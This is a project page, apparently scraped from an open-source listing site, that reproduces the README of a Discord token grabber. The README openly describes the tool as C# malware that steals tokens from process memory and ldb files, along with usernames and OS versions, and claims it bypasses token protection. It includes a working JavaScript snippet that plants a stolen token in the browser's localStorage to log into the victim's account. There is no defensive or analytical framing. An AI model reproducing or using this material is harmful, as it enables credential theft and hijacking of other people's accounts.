ZeroM3m0ry Discord Token Grabber Save

C# Malware that Steal Discord Token Directly From Memory and bypass any kind of token protection

Project README

Discord-Token-Grabber

Token-Stealer

Features

  • Steal
    • Token directly From memory
    • Token from ldb files
    • username
    • os version
    • bypass any kind of token protection

How to login using token

function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}
  • use login("token"); then refresh the webpage ,and you will login automatically to the account using only token
Open Source Agenda is not affiliated with "ZeroM3m0ry Discord Token Grabber" Project. README Source: ZeroMemoryEx/DeadLight

Open Source Agenda Badge

Open Source Agenda Rating